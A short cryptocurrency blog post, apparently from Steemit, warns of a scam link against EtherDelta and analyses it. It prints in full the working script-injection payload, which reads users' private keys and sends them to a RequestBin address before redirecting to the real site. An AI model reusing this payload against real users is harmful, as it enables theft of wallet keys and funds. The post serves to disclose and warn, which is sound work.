Another day, another EtherDelta scam

in #cryptocurrency7 years ago

This simple scam once again depends on tricking the victim into clicking a malicious link. 

The code was hosted on  the Google URL Shortener service and still appeared to be active at the time of writing:

https://goo.gl/#analytics/goo.gl/uKAuke/all_time

The payload was as follows:

https://etherdelta.com/#0x">
<script>
	if (typeof g === "undefined" || g == 0) {
		var g = 0;
		m();
	} 
	function m() {
		var a = main["\x45\x74\x68\x65\x72\x44\x65\x6c\x74\x61"].pks; 
                // main["EtherDelta"].pks
		for (var x=0;x<a.length;x++) {
			if(a[x] != "") {
				$.ajax({
					url:"https://requestb.in/19nxov41?1="+a[x],
					async:false
				});
				g = 1;
			}
		}
		if (g == 1) {
			window.location.href = "https://etherdelta.com";
		}
	}
</script>
<input d="-ETH

The victim is redirected to https://etherdelta.com

The URL also contains a short script which reads main["EtherDelta"].pks - the victim's private key - into a variable then sends it to RequestBin, a site that allows users to collect and inspect HTTP requests.

The attacker is then able to easily gather victim's private keys and empty their wallets.

Please note this attack is again only effective against users who choose to import their private key into EtherDelta.

#etherdelta #scam
7 years ago in #cryptocurrency by
$0.11
  • Past Payouts $0.11
  • - Author $0.11
  • - Curators $0.01
3 votes
Reply 1
Sort:  
  • Trending
    • [-]
     7 years ago  

    Man, the scammers never rest! This is quite the malicious hack, thanks for sharing.

    $0.00
      Reply